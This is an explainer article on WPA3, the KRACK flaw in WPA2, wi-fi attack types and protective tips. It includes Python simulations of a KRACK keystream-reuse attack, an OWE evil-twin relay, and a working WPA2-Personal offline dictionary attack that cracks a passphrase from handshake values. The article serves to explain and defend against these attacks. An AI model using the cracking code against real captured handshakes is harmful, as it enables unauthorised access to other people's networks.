What is WPA3? Wi-Fi Protected Access (WPA) is often referred to as a security standard or protocol used to encrypt and protect wi-fi networks like the one you probably use at home or work, but it is actually a security certification program developed by the Wi-Fi Alliance to secure wireless computer networks.
WPA3, released in June 2018, is the successor to WPA2, which security experts describe as “broken.” The goal of developing WPA3 was to make WPA easier to use and to increase its cryptographic strength.
Like its predecessor, WPA3 comes in Personal and Enterprise editions, but this version improves on WPA2 with more robust authentication and encryption features, and it mandates the fixes for KRACK, the key reinstallation flaw in the WPA2 handshake. It also includes functionality to simplify, and better secure, the connection of IoT wi-fi devices.
The KRACK (Key Reinstallation Attack) flaw is best categorised as a replay attack carried out from a man-in-the-middle position between client and access point. The fundamental problem with WPA2, highlighted by the KRACK discovery, is a flaw in the IEEE 802.11 standard that WPA2 certifies against, not a weakness caused by bad product configuration or a sloppy implementation.
We will dive deeper into KRACK later, but the bottom line is that any unpatched implementation that follows the standard to the letter is vulnerable; the vulnerability was inherent in the protocol specification. The response was twofold: patches to existing WPA2 implementations and, in the longer term, a new certification, WPA3.
What is WPA3?
In June 2018, Wi-Fi Alliance® announced the introduction of Wi-Fi CERTIFIED WPA3™security, a wi-fi certification standard that:
- Addresses the KRACK vulnerability
- Upgrades WPA2 with additional security features. This is important because there are multiple wi-fi security holes that are more attractive to hackers, and far easier to breach, than KRACK.
WPA3 certification for wi-fi devices can loosely be compared to a roadworthy certificate for your car. Without certification, hardware vendors cannot claim compliance with the Wi-Fi Alliance’s security standards.
WPA3 became mandatory for all new wi-fi certified devices in 2020. Some older devices will have received software updates to support WPA3 — though many won’t.
What is WPA3 and is it secure?
This article looks at how WPA3 improves on WPA2 security, and puts KRACK into perspective. While WPA3 is definitely the right security route to take in the future, users should ensure they implement a multi-faceted, layered security strategy to protect all aspects of their wi-fi network. WPA3 is not enough to completely protect wi-fi networks, although its improvements go a long way towards plugging other wi-fi security holes.
We will also discuss some of the criticisms that have been leveled at WPA3. Finally, we will touch on some of the ways home users and businesses can practice safe wi-fi.
So, is WPA3 secure? Let’s find out.
The extent of the KRACK vulnerability
The discovery of KRACK caused some disquiet in the IT community, because so many wi-fi devices use WPA2 and more and more people use those devices to connect to the internet. According to Wigle, as of October 2023 more than 1.15 billion wireless networks had been observed worldwide.
Thanks to the KRACK patches and, later, WPA3, there have so far been no documented KRACK attacks in the wild. However, there are plenty of unpatched devices that remain vulnerable.
How secure are current wi-fi encryption standards?
- Wired Equivalent Privacy (WEP) – Thoroughly broken but still in use. According to Kaspersky Labs, it would take hackers just a few minutes to crack WEP-protected networks.
- Open networks – No security at all.
- Wi-Fi Protected Access (WPA) – Introduced in 2003 as an interim replacement for WEP and superseded by WPA2 in 2004. The problem with WPA is its reliance on TKIP, a stopgap built around the same RC4 cipher as WEP, which is no longer considered secure.
- Wi-Fi Protected Access 2 (WPA2)
- The Personal version is reasonably secure but vulnerable to brute-force and dictionary attacks: anyone in radio range can capture the four-way handshake at the start of a session and try candidate passphrases against it offline.
- The Enterprise version is largely protected from this because it authenticates each user with 802.1X/EAP credentials and derives a fresh master key per session, so there is no shared passphrase to guess.
- Wi-Fi Protected Access 3 (WPA3) – Announced in January 2018 and launched in June 2018 as the replacement for WPA2, although it has taken years to roll out. It provides the best wi-fi security currently available.
Bear in mind that KRACK specifically targets the four-way handshake of WPA and WPA2 (Personal and Enterprise alike). An open, unsecured network is not encrypted and is vulnerable to pretty much any other type of attack, but not to KRACK, because there is no handshake to attack.
Encryption types used in public wi-fi hotspots globally (Source: Kaspersky Security Network (KSN))
A KRACKing analogy
Flaws in the handshake, the point where the access point (AP) and the client device meet and greet to confirm the client's credentials and agree session keys, lie at the heart of the WPA2 vulnerability.
To set the scene, here’s an analogy for the handshake process — if you allow the imagination a little license — based on a visit to a bank.
Illustration of a three-way handshake as described in the analogy below (Source: Wikipedia, with modifications)
- Let us pretend you are at the bank and the teller asks for your name, password, and phone number before they will give you money. You and the bank have agreed on this security procedure to prove you are who you say you are when you withdraw money.
- You give the teller your name, password, and cell number. At this bank, the next step in the process is for the bank to send to your phone a secret code which you will use to confirm your identity.
- Meanwhile, unbeknown to you, somebody behind you in the queue is eavesdropping and has heard your name and password, and most importantly your secret code.
- After you leave the bank the eavesdropper scurries up to the teller and, while your secret code is still valid, withdraws the last of your funds using your stolen name, password and secret code.
You have probably spotted the weak point in the above scenario. Security was compromised when your credentials were established: not because they were overheard, but because your secret code was still valid after you left the bank. Had it expired, your name, password, cell phone number and secret code would have been of no use to the eavesdropper.
There is a twist in this tale: the teller and the eavesdropper are in cahoots. This fake teller has in fact spoofed the real teller (who is out to lunch) and this is a man-in-the-middle attack. Both criminals now have your credentials.
This problem, as we shall see, is what WPA3 resolves.
How is WPA2 vulnerable?
The primary vulnerability in WPA2 is the four-way handshake it uses to derive session keys from a Pre-Shared Key (PSK). In WPA3-Personal, the PSK-derived master key is replaced by one negotiated through the Simultaneous Authentication of Equals (SAE) handshake; the four-way handshake still follows it, but certified implementations must refuse to reinstall a key that is already in use.
In this section, we will use the analogy from the previous section to help illustrate the problem.
Pre-Shared Key (PSK)
The initial part of the security check you went through at the bank in the analogy above can loosely be compared to WPA2-PSK authentication, which requires an individual to connect to a wi-fi network (asking for money at the bank in our metaphor) using a passphrase. A PSK is a "shared secret", in this case a password.
- WPA2 without a PSK is WPA2-Enterprise, the option used with an authentication (RADIUS) server. A business should choose it to give each employee's device unique credentials. If one credential is compromised, the business only needs to revoke and reissue it for that one device. This also prevents other devices being compromised by a lost or stolen key, which they would be if all devices shared the same passphrase.
- What is the difference between WPA2-PSK and WPA2-Personal? The terms are used interchangeably, although some vendor interfaces use WPA2-Personal to imply AES (CCMP) and WPA2-PSK to imply a choice between the older TKIP and AES. As a Cisco blog explains, some devices allow WPA with AES and WPA2 with TKIP: AES is optional in WPA, while in WPA2 AES is mandatory and TKIP is only retained for backward compatibility. Both terms refer to the use of a PSK, which is what distinguishes WPA2-Personal from WPA2-Enterprise.
Credential authentication in telecommunications is called handshaking. At the bank, you and the teller exchanged a three-step handshake to establish your credentials, the secret code being the final step in the process.
All WPA, WPA2 and WPA3 networks use a four-way handshake to agree the session keys that encrypt data frames.
In the illustration below, the spoofed wi-fi access point is the fake teller you dealt with at the bank.
Illustration of how a KRACK attack intercepts a four-way handshake (Source: Enisa)
Rowell Dionicio, writing for Packet6, explains: “The attacker will spoof a real access point and trick a client into joining the rogue access point but allows Wi-Fi authentication to complete. To pull off the KRACK attack, the attacker will replay a message within the 4-Way Handshake. The flaw here is that the victim’s device will accept the replay of one of these messages when it should not. Thus allowing the attacker to use a previously used key. A key should only be used once and this is the flaw KRACK attack targets.”
Dionicio goes on: "The technical fix to a KRACK Attack is to prevent the reuse of nonce values. Devices must not accept previously used keys."
Read a more technical explanation of nonce reuse by Mathy Vanhoef, KRACK researcher.
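The replay described above, as an added simulation that is not code from the page, from Packet6 or from the KRACK researchers: a toy client runs the four-way handshake, sends one frame, receives a retransmitted message 3, and sends another. The cryptographic primitives are stand-ins (one HMAC for the IEEE PRF-384 that derives the PTK, and HMAC-SHA256 in counter mode for the AES-CTR inside AES-CCMP); the plaintext frames are constructed. What is faithful is the state machine: installing the key resets the packet number, and an unpatched client reinstalling the same key therefore encrypts two frames with the same keystream, so the XOR of the ciphertexts equals the XOR of the plaintexts.

```python
import hashlib
import hmac
import os

# Added example, not real 802.11 code. Stand-ins for the WPA2 primitives:
#  - toy_ptk()   one HMAC instead of the IEEE PRF-384 key expansion
#  - keystream() HMAC-SHA256 in counter mode instead of AES-CTR inside AES-CCMP
# Like AES-CTR, this keystream depends only on (temporal key, packet number),
# so a repeated packet number under the same key repeats the keystream.

PMK = hashlib.sha256(b"constructed pre-shared key material").digest()  # real: PBKDF2(passphrase, SSID)


def toy_ptk(pmk, anonce, snonce):
    return hmac.new(pmk, b"Pairwise key expansion" + anonce + snonce, hashlib.sha256).digest()


def keystream(tk, pn, length):
    """Counter-mode keystream for temporal key tk and packet number pn."""
    out = b""
    block = 0
    while len(out) < length:
        ctr = pn.to_bytes(6, "big") + block.to_bytes(2, "big")  # CCMP packet numbers are 48-bit
        out += hmac.new(tk, ctr, hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class Client:
    """Supplicant side of the 4-way handshake. With patched=False a retransmitted
    message 3 reinstalls the key and resets the packet number (the KRACK bug)."""

    def __init__(self, patched):
        self.patched = patched
        self.snonce = os.urandom(32)
        self.ptk = None
        self.tk = None   # installed temporal key
        self.pn = 0      # transmit packet number (the CCMP nonce) for the installed key

    def on_msg1(self, anonce):
        # Message 1 (AP -> client) carries ANonce; the client can now compute the PTK.
        self.ptk = toy_ptk(PMK, anonce, self.snonce)
        return self.snonce  # message 2 (client -> AP) carries SNonce

    def on_msg3(self, anonce):
        # Message 3 (AP -> client) confirms the AP holds the PTK; the client installs it.
        tk = self.ptk[:16]
        if self.patched and self.tk == tk:
            # Key already installed: send message 4 again but leave the counters alone.
            return
        self.tk = tk
        self.pn = 0  # fresh key, fresh counter; fatal when the key is not actually fresh

    def send(self, plaintext):
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.tk, self.pn, len(plaintext)))


def krack_replay(patched):
    """Handshake, one data frame, retransmitted message 3, second data frame.
    Returns what an attacker sniffing the channel can observe and compute."""
    client = Client(patched)
    anonce = os.urandom(32)
    client.on_msg1(anonce)
    client.on_msg3(anonce)
    pt1 = b"GET /account HTTP/1.1"   # constructed frame whose content the attacker can guess
    pt2 = b"Cookie: session=abc01"   # constructed frame the attacker wants to read
    pn1, ct1 = client.send(pt1)
    # The attacker withheld message 4 from the AP, so the AP retransmits message 3;
    # the attacker now forwards that retransmission to the client.
    client.on_msg3(anonce)
    pn2, ct2 = client.send(pt2)
    return {
        "nonce_reused": pn1 == pn2,
        "ct_xor_equals_pt_xor": xor(ct1, ct2) == xor(pt1, pt2),
        "recovered_pt2": xor(xor(ct1, ct2), pt1),  # correct only when the keystream repeated
    }
```

Run `krack_replay(False)` and the attacker recovers the second frame from the first; run `krack_replay(True)` and the patched client keeps counting from where it left off, so the two frames use different keystreams and the XOR trick yields garbage.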
Is WPA3 secure? Sure, but there are improvements to WPA2 too
Various WPA2 enhancements were deployed while WPA3 was being rolled out. These include:
- Imposing the adoption of Protected Management Frames (PMF) on all ‘Wi-Fi CERTIFIED’ devices
- Ensuring vendors do regular checks on certified devices
- Standardising the 128-bit cryptographic suite
What are the two WPA3 versions?
WPA3 comes in two versions based on the end-user's requirements, i.e. home or business use. On the face of it there is not much difference between WPA3-Personal and WPA3-Enterprise, although the latter is aimed at large organisations handling sensitive data and offers a stronger optional mode.
Let us quickly summarize the two versions as described by the Wi-Fi Alliance. For starters, both versions:
- Use the latest security methods
- Disallow outdated legacy protocols
- Require the use of Protected Management Frames (PMF). According to the Wi-Fi Alliance: "Unicast management action frames are protected from both eavesdropping and forging, and multicast management action frames are protected from forging." In a nutshell, Wikipedia describes management frame protection as providing "data integrity, data origin authenticity, and replay protection" for the deauthentication, disassociation and action frames that an attacker could otherwise forge to knock clients off a network. You can find a technical description of how it works on the Cisco website.
WPA3-Personal
This version provides password-based authentication with good security even when users choose short or weak passwords. It does not require an authentication server and is the basic mode home users and small businesses use.
- Uses 128-bit encryption
- Makes use of a Simultaneous Authentication of Equals (SAE) handshake which protects against brute force attacks
- Incorporates forward secrecy: a fresh set of session keys is negotiated every time a WPA3 connection is made, so an attacker who learns the password later cannot decrypt traffic recorded earlier (they can still join the network and attack it actively, so the password still matters)
- Bolsters security on public networks
- Easily manages connected devices
- Allows Natural Password Selection, which the Wi-Fi Alliance claims will make it easier for users to remember passphrases
WPA3-Enterprise
Provides extra protection for enterprise networks transmitting sensitive data, for instance governments, healthcare organizations and financial institutions. Includes an optional 192-bit minimum strength security mode, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems. This was a request by the US government.
The main difference between WPA3-Personal and WPA3-Enterprise is at the authentication level. The Personal version authenticates with a shared passphrase via SAE, while the Enterprise version keeps per-user authentication through IEEE 802.1X/EAP, as in WPA2-Enterprise, and adds the optional 192-bit mode on top. Visit the Wi-Fi Alliance for the technical specification.
For more information, Eric Geier, writing for Cisco Press, explains how businesses can make the move to WPA3-Enterprise.
New WPA3 features: Four areas of improvement
Four new features in WPA3 are designed to improve on WPA2. However, only one of these is mandatory for WPA3 certification: the Dragonfly (SAE) handshake. Below is a brief summary of the main features. We will go into more detail later in this section.
- More secure handshake – Simultaneous Authentication of Equals (SAE) protocol (aka the Dragonfly handshake) requires a new interaction with the network every time a device requests an encryption key, slowing down the rate of an attempted attack and making a password more resistant to dictionary and brute force attacks. It also prevents offline decryption of data.
- Replacement of wi-fi protected setup (WPS) – a simpler way to securely add new devices to a network using the Wi-Fi Device Provisioning Protocol (DPP), which allows you to securely add new devices to a network using a QR code or a password. Easy Connect makes setup especially easy for connected home and IoT devices.
- Unauthenticated encryption – Better protection when using public hotspots using Wi-Fi Enhanced Open which provides unauthenticated encryption, a standard called Opportunistic Wireless Encryption (OWE).
- Bigger session key sizes – WPA3-Enterprise will support key sizes the equivalent of 192-bit security during the authentication stage, which will be harder to crack.
Let’s take a more detailed look at the litany of acronyms mentioned above.
Simultaneous Authentication of Equals (SAE) against brute force attacks
SAE is a secure, password-based key exchange used by the WPA3-Personal version to protect users from brute force attacks. It is well-suited to mesh networks, which get their name from the way they create wi-fi coverage. Comparitech describes the setup simply: “By placing several devices around your home, each sending off a wireless signal, you create a ‘mesh’ or network of wireless coverage around your home. This helps eliminate dead or weak spots.”
The benefits of SAE:
- Based on the IETF Dragonfly key exchange, a cryptographic model for authentication using a password or passphrase, which is resistant to both active and passive attacks, and to offline dictionary attacks.
- Enables Forward Secrecy which disallows an attacker from recording an encrypted transmission that could potentially be decoded later should the wireless network password be compromised in the future.
- Only allows one password guess per session. Even if attackers steal data with the hope of cracking the password in their leisure offline, they will be stymied by the one guess feature because they have to “ask” the wi-fi router each time if their guess was correct. Essentially, this limits an attacker to real-time attacks. There has been some question whether this feature could limit legitimate users too. In the real world, legitimate users are unlikely to make 100 automated consecutive guesses within a second, as do hackers, and an application can be coded to allow a limited number of guesses before it starts slowing the service. This feature also hardens the security of weak passwords.
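To make the contrast concrete, here is an added example (not code from the page or from any tool) of the offline dictionary attack that WPA2-Personal permits and SAE does not. It reproduces the WPA2-Personal derivation faithfully: PMK via PBKDF2-HMAC-SHA1 over the SSID, PTK via the IEEE 802.11 PRF-384, and the message 2 MIC via HMAC-SHA1 with the key confirmation key. The "capture" (MAC addresses, nonces, EAPOL bytes) is constructed for the example; in practice it comes from a packet capture taken in radio range. Every guess after that runs on the attacker's own hardware with no further contact with the access point, which is exactly what SAE's one-guess-per-exchange property takes away.

```python
import hashlib
import hmac

# Added example, not the page's or any tool's code. Mirrors the WPA2-Personal key
# derivation so the offline nature of the attack is visible: no packets are sent.


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key, label, data):
    """IEEE 802.11 PRF-384: HMAC-SHA1 over label||0x00||data||counter, truncated to 48 bytes."""
    out = b""
    for i in range(3):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake capture (values invented for this example).
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes.fromhex("0a" * 32)
SNONCE = bytes.fromhex("5c" * 32)
EAPOL_MSG2 = bytes.fromhex("0203005f02010a") + b"\x00" * 88  # constructed EAPOL-Key bytes, MIC field zeroed


def make_capture(passphrase):
    """Produce the MIC a real client would put in message 2 (stands in for sniffing it)."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck = ptk[:16]  # first 128 bits of the PTK are the key confirmation key
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_MSG2, "mic": eapol_mic(kck, EAPOL_MSG2)}


def offline_dictionary_attack(capture, wordlist):
    """Return (passphrase, guesses_tried), or (None, guesses_tried) if the list is exhausted."""
    for n, candidate in enumerate(wordlist, 1):
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap"], capture["sta"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate, n
    return None, len(wordlist)
```

The cost per guess is one PBKDF2 run (4096 SHA-1 iterations), which is why GPU crackers get through large wordlists quickly; with SAE the attacker has nothing to check a guess against without talking to the access point for every single candidate.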
Device Provisioning Protocol (DPP) for managing networks and IoT devices
Wi-Fi CERTIFIED Easy Connect™ (which replaces the flawed Wi-Fi Protected Setup, WPS) helps you connect all your devices, even those that do not have a user-friendly interface to type in your password (e.g. Google Home or your smart fridge), using a single intermediate device.
Wi-Fi Alliance describes how it works: A network owner chooses one device as the central point of configuration. While a device with a nice GUI is easiest, you can use any device able to scan a quick response (QR) code or use NFC as the configurator device. Running the DPP — a one-size-fits-all enrolment procedure — from this device connects all scanned devices and gives them the credentials needed to access the network. Note: This is an optional feature and only available on devices with Easy Connect.
After a wi-fi device has been enrolled, it uses its configuration to discover and connect to the network through an access point.
Opportunistic Wireless Encryption (OWE) for safer hotspot surfing
OWE is the mechanism behind the Wi-Fi Enhanced Open feature, introduced to protect users on public and guest hotspots from eavesdropping. It is the replacement for the old 802.11 "open" mode: the client and the access point run an unauthenticated Diffie-Hellman exchange during association and derive a pairwise key from it, so your data is encrypted even though you never entered a password.
Because the key is derived per association, each client's session has its own encryption key (the Wi-Fi Alliance calls this individualized data protection): other users on the same hotspot cannot read your traffic, which they can on a classic open network, or on a password-protected network where everyone shares the same PSK. OWE itself applies only to open networks; on WPA3-Personal networks the equivalent per-session protection comes from the SAE handshake described above, which means that knowing the network password does not let an attacker passively decrypt other users' traffic.
Are you vulnerable to KRACK?
All is not doom and gloom. Anyone who uses wi-fi is potentially exposed, but let us put the problem into perspective. A KRACK attacker who strips the wi-fi encryption still only sees traffic that is not encrypted above that layer. If data has been properly encrypted using HTTPS or a VPN, the attacker cannot read it.
Some reassurance from Brendan Fitzpatrick, Vice President, Cyber Risk Engineering, writing for Axio:
- An attack cannot be launched remotely, an attacker needs to be in physical range of a particular wi-fi network.
- An attack takes place only during the four-way handshake.
- The wi-fi passphrase is not revealed during the attack and the attacker is not enabled to join the network.
- Only if the attack is successful can the attacker potentially decrypt traffic between the victim and their access point.
- Currently, the attack is focused only on the client side of the handshake.
In a blog post, Robert Graham notes, KRACK "can't defeat SSL/TLS or VPNs." He adds: "Your home network is vulnerable. Many devices will be using SSL/TLS, so are fine, like your Amazon echo, which you can continue to use without worrying about this attack. Other devices, like your Philips lightbulbs, may not be so protected." The solution? Patch with updates from your vendor.
What software and devices are vulnerable to KRACK?
According to Mathy Vanhoef, Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys and others could all be affected by some variant of the attacks. Linux and Android 6.0 and higher were particularly exposed, because the wpa_supplicant versions they shipped cleared the key from memory after installing it, so a replayed message 3 installed an all-zero key rather than merely reinstalling the old one.
You can find a list of affected vendors on the Vulnerability Notes Database run by the CERT Coordination Center at Carnegie Mellon's Software Engineering Institute. The site provides links to vendor information about patches and fixes.
What sort of attack vulnerabilities do insufficiently secured networks expose?
It is not just the danger of being KRACK’d. An unsecured wi-fi network is begging to be attacked. WPA3 will help mitigate these risks. US-Cert outlines the potential attack scenarios:
- Piggybacking: Typical indoor wi-fi range is 150 – 300 feet. If you live close to your neighbor, your connection could be open to attackers… or even the geek son next door who uses your wi-fi to download his movies.
- Wardriving: A type of piggybacking where potential attackers drive around neighborhoods with an antenna looking for unsecured wireless networks.
- Evil twin attacks: In an evil twin attack, an attacker mimics a public network access point, setting up their broadcast signal to be stronger than the one generated by the legitimate access point. Naturally, users connect to the stronger signal, the criminal’s. The victim’s data is then easily read by the hacker. Always check the name and password of a wi-fi hotspot before you connect.
- Wireless sniffing: Avoid public access points that are not secured and where data is not encrypted. Criminals use “sniffers” to find sensitive information such as passwords or credit card numbers.
- Unauthorized computer access: An unsecured hotspot could allow an attacker to access any directories and files you have unintentionally made available for sharing. Always block file sharing in public.
- Shoulder surfing: In public areas, watch out for lurkers, attackers who watch you typing as they walk past or video your session. You can buy a screen protector to avoid this.
- Theft of mobile devices: It is not just the network that poses a risk for your data. If your device is stolen when you are working at a hotspot, it is a bonanza day for criminals. Make sure your data is always password-protected and sensitive information is encrypted. That includes data on portable storage devices.
Some cautions: Words of warning from the finders of the KRACK flaw
Mathy Vanhoef, Postdoctoral Researcher in Computer Security at KU Leuven and one of the researchers who discovered KRACK, has some cautionary remarks about WPA3 worth pondering.
- SAE handshake – If the SAE handshake is not carefully implemented, it may be vulnerable to side-channel attacks: the password-element derivation in Dragonfly has to run in constant time, otherwise timing and cache behaviour leak information that lets an attacker narrow down the password. WPA3 cannot prevent exploitable vulnerabilities that arise from flawed implementations.
- Unauthenticated encryption – While the use of Opportunistic Wireless Encryption (OWE) will strengthen user privacy in open networks, Vanhoef suggests that only passive attacks (ones in which hackers sniff traffic) can be prevented. Active attacks (ones using dummy access points to trick users) will still enable an adversary to intercept traffic. Vanhoef explains:
One shortcoming of OWE is that there is no mechanism to trust an Access Point on first use. Contrast this with, for example, SSH: the first time you connect to a SSH server, you can trust the public key of the server. This prevents an adversary from intercepting traffic in the future. However, with OWE there is no option to trust a particular AP on first use. So even if you connected to a particular AP previously, an adversary can still set up a fake AP and make you connect to it in the future.
- Missed opportunity – Only one of the four features touted by the Wi-Fi Alliance is actually mandatory for WPA3. “Unfortunately, the WPA3 certification program only mandates support of the new dragonfly handshake. That’s it. The other features are either optional or a part of other certification programs. I fear that in practice this means manufacturers will just implement the new handshake, slap a ‘WPA3 certified’ label on it, and be done with it,” says Vanhoef. The end-result will be that the end-user does not actually know what features are included and how secure they are.
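The point Vanhoef makes about OWE, and the Opportunistic Wireless Encryption section above, as an added example that is not code from the page or from the Wi-Fi Alliance. Toy Diffie-Hellman in a prime field stands in for the ECDH (NIST P-256 by default) and HKDF that OWE really uses; the parameters are chosen for readability only. Two runs are shown: an honest association, where a passive sniffer sees both public values but cannot derive the key, and an evil-twin association, where a rogue AP answers the station and opens its own OWE association to the real AP. Both legs are encrypted, but with keys the attacker holds, and nothing in the exchange lets the station notice.

```python
import hashlib
import secrets

# Added example, not the page's or any vendor's code. Toy DH parameters (assumption
# for this example: 2**255 - 19 is prime but not a safe prime, and no subgroup checks
# are done); real OWE uses ECDH on P-256 and HKDF. Never reuse these for anything real.
P = 2**255 - 19
G = 2


def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def derive_pmk(priv, peer_pub):
    """Both sides hash the shared secret into a PMK (real OWE: HKDF over the ECDH output)."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(32, "big")).digest()


class Party:
    """A station or an AP. OWE carries the public value in the (Re)Association
    Request/Response; nothing in the exchange binds it to an identity."""

    def __init__(self, name):
        self.name = name
        self.priv, self.pub = keypair()
        self.pmk = None

    def request(self):
        return self.pub                  # station -> AP: Diffie-Hellman parameter element

    def respond(self, peer_pub):
        self.pmk = derive_pmk(self.priv, peer_pub)
        return self.pub                  # AP -> station: its own parameter element

    def finish(self, peer_pub):
        self.pmk = derive_pmk(self.priv, peer_pub)


def honest_association():
    """Passive attacker: sees sta.pub and ap.pub on the air, cannot compute the PMK."""
    sta, ap = Party("station"), Party("AP")
    sta.finish(ap.respond(sta.request()))
    return sta.pmk == ap.pmk


def evil_twin_association():
    """Active attacker: a rogue AP with the same SSID answers the station and opens
    its own OWE association to the real AP, then relays between the two."""
    sta, ap = Party("station"), Party("AP")
    rogue_ap, rogue_sta = Party("rogue as AP"), Party("rogue as station")
    sta.finish(rogue_ap.respond(sta.request()))        # station <-> rogue leg
    rogue_sta.finish(ap.respond(rogue_sta.request()))  # rogue <-> real AP leg
    return {
        "station_and_ap_agree": sta.pmk == ap.pmk,
        "rogue_reads_station_leg": rogue_ap.pmk == sta.pmk,
        "rogue_reads_ap_leg": rogue_sta.pmk == ap.pmk,
    }
```

The station has no stored public key to compare against, which is the SSH-style trust-on-first-use that Vanhoef says OWE lacks; it simply derives a key with whoever answered. That is still a large improvement over plain open networks for the passive case, and TLS or a VPN on top covers the active one.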
What do the cynics, including IT developers, have to say about WPA3?
The conversations on Bruce Schneier's blog, DD-WRT, Security Stack Exchange and the Spiceworks Community contain some interesting input on whether WPA3 really is the ultimate panacea for wi-fi security vulnerabilities. Some contributions include:
- “I suspect WPA3 will help. For a while – until the bad boys find another hole.”
- “A great revenue stream for hardware vendors who will stop patching current gear and insist you buy the new WAPs if you want WPA3.”
- “The most disappointing aspect of WPA3 is that like all previous wi-fi standards (WEP, WPA, WPA2, even WPS), this one has been developed by a closed, members-only, consortium […] All the WPA3 announcement promises is that the closed process on WPA4 can now begin.”
- “The attack vector using KRACK is simply too small (and will continue to decrease) to make these attacks widespread.“ Open networks, for instance, are not vulnerable to KRACK but are much more at risk to malicious attacks than WPA2 networks. At the time of writing, no KRACK attacks have, in fact, been documented; experts argue, that is because the effort is too great for cybercriminals when there are so many softer targets around.
On that cynical note, practice safe wi-fi, stay informed, and start saving for a new router. According to Dion Phillips, writing for InfiniGate, “… it is doubtful that current wireless devices will be updated to support WPA3 and far more likely that the next wave of devices will be put through the certification process. That being said, client devices will also need to be certified in the same way to be able to take advantage of the new certification.”
How can you protect yourself?
How can businesses protect themselves?
Mathew Hughes has a few practical suggestions tempered with a few words of caution.
- Install a backwards-compatible patch: Unfortunately, says Hughes, not only are many people slow to install patches, many manufacturers are slow at issuing them.
- Install a VPN, an encrypted tunnel between devices, preventing eavesdropping by outsiders: For some people, he says, this may be impractical as they won’t be able to access other connected devices on their network.
- Use SSL/TLS: This provides an extra layer of encryption to thwart thieves and eavesdroppers, because TLS encrypts application traffic end to end above the wi-fi link layer that KRACK attacks; a decrypted wi-fi frame then yields only TLS ciphertext.
- Update devices and software: Ensure your IT department rolls out regular software updates and patches for all company devices including BYODs. Contact the manufacturers to make sure they have actually issued patches that address the KRACK flaw.
- Secure your router: Keep it locked away, safe from internal threats or outsiders visiting the building. Change the defaults that weaken it: restrict inbound traffic, disable unused services (remote administration in particular), change the default login credentials, and rename the default SSID. Check the router firewall is enabled (it is not always on by default). Put staff and customers on separate SSIDs, ideally on separate VLANs. Turn off Wi-Fi Protected Setup (WPS), the push-button/PIN pairing aid, whose PIN method can be brute-forced.
Read the related tips for home networks below.
Wi-fi security tips for home networks and IoT devices
- Practice basic wi-fi security sense: Read Comparitech’s guide to securing your home wi-fi network.
- Stop using wi-fi: At home, connect via ethernet; on the move, use mobile data (3G/4G/5G) rather than a hotspot, particularly for sensitive transactions.
- Update devices and software: That includes all your devices as well as your router. Contact the manufacturers to make sure they have actually issued patches that address the KRACK flaw.
- Disable file sharing: While it is tempting to share photos with friends and family, try to avoid doing this in a public place. You should also create a directory for file sharing and restrict access to other directories. Always password-protect anything you share.
- Do not perform sensitive transactions in public places: Do your online banking at home.
- Set HTTPS by default in your browser: The major browsers allow you to enable a HTTPS-only mode. The Electronic Frontier Foundation (EFF) tells you how to do it for Firefox, Chrome, Edge and Safari.
- Use a VPN: While VPNs provide great security for your data, make sure your provider is as security-conscious as you are and acknowledges your right to privacy. Some VPNs will log your data despite claiming not to. Read more on this in our in-depth study of 140 VPN logging policies.
- Set up a virtual router: A virtual router on your laptop lets you share one internet connection with other nearby devices over a network you control. It is easier than you think, and similar to setting up a wi-fi hotspot on your smartphone.
- Secure your router: There are a number of defaults on your router you can change to harden security, e.g. restricting inbound traffic, disabling unused services such as remote administration and WPS, changing the default admin password, and renaming the default SSID.
- Confirm your ISP is up-to-date: Many home wi-fi users use the router supplied by their ISP. If you do, confirm your ISP has patched all their devices.
- Avoid public wi-fi hotspots: Or, at least learn how to minimize the risks of using public wi-fi.
- Manually check URLs are secure: HTTPS URLs use TLS encryption to protect visitors to the site; plain HTTP URLs do not. You can see which one you have in the address bar. Also enable the Always use secure connections (HTTPS-only) option on your device.
- Use secure passwords: Comparitech has some suggestions on creating strong passwords. Always change default passwords, like “Admin” or “123.”
- Keep antivirus software up to date: Choose reputable antivirus software and keep it patched. There are also plenty of free antivirus applications around.
- Turn it off: Turn off your wi-fi connection when you are not using it and disable automatic reconnection.
- Use multi-layered security: Keep your operating system’s firewall updated and use two-factor authentication to access your internet accounts.
- Use Advanced Encryption Standard (AES) encryption: Check that your home network uses WPA2 (or WPA3) with AES-CCMP, not TKIP. Both are vulnerable to traffic decryption via KRACK, but against AES-CCMP the attacker can only decrypt and replay frames, whereas with TKIP (and GCMP) the attacker can also forge and inject packets.
